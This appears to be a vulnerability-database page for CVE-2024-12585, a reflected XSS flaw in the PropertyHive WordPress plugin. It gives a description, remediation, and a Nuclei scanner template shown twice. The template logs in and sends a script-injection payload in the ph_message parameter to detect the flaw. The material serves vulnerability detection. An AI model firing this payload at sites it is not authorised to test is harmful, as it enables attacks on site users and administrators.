PropertyHive < 2.1.1 - Cross-Site Scripting

CVE-2024-12585

Verified

Description

The Property Hive plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ph_message' parameter in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

Severity

Medium

Published Date

February 6, 2026

Template Author

shivam kamboj

CVE-2024-12585.yaml

id: CVE-2024-12585

info:
  name: PropertyHive < 2.1.1 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    The Property Hive plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ph_message' parameter in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to version 2.1.1 or later where input sanitization and escaping are properly implemented.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/propertyhive/property-hive-210-reflected-cross-site-scripting
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12585
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2024,wordpress,wp,wp-plugin,propertyhive,xss,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ph-settings&ph_message="><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "ph_message", "property-hive_page_ph-settings")'
        condition: and
# digest: 4a0a0047304502204d1bcd5d3f3b74ba11ed7f5eb6a017267457b8fa92084df39938c89640970106022100c71cae0587ac065e0fea5348da51db4aa9aef3f35a01b3cea257accd14444579:922c64590222798bb761d5b6d8e72950

5.0Severity

CVSS Metrics

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/propertyhive/property-hive-210-reflected-cross-site-scripting https://nvd.nist.gov/vuln/detail/CVE-2024-12585

Remediation Steps

Update to version 2.1.1 or later where input sanitization and escaping are properly implemented.

Description

id: CVE-2024-12585

info:
  name: PropertyHive < 2.1.1 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    The Property Hive plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ph_message' parameter in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to version 2.1.1 or later where input sanitization and escaping are properly implemented.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/propertyhive/property-hive-210-reflected-cross-site-scripting
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12585
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2024,wordpress,wp,wp-plugin,propertyhive,xss,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ph-settings&ph_message="><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "ph_message", "property-hive_page_ph-settings")'
        condition: and
# digest: 4a0a0047304502204d1bcd5d3f3b74ba11ed7f5eb6a017267457b8fa92084df39938c89640970106022100c71cae0587ac065e0fea5348da51db4aa9aef3f35a01b3cea257accd14444579:922c64590222798bb761d5b6d8e72950

PropertyHive < 2.1.1 - Cross-Site Scripting

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

PropertyHive < 2.1.1 - Cross-Site Scripting

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps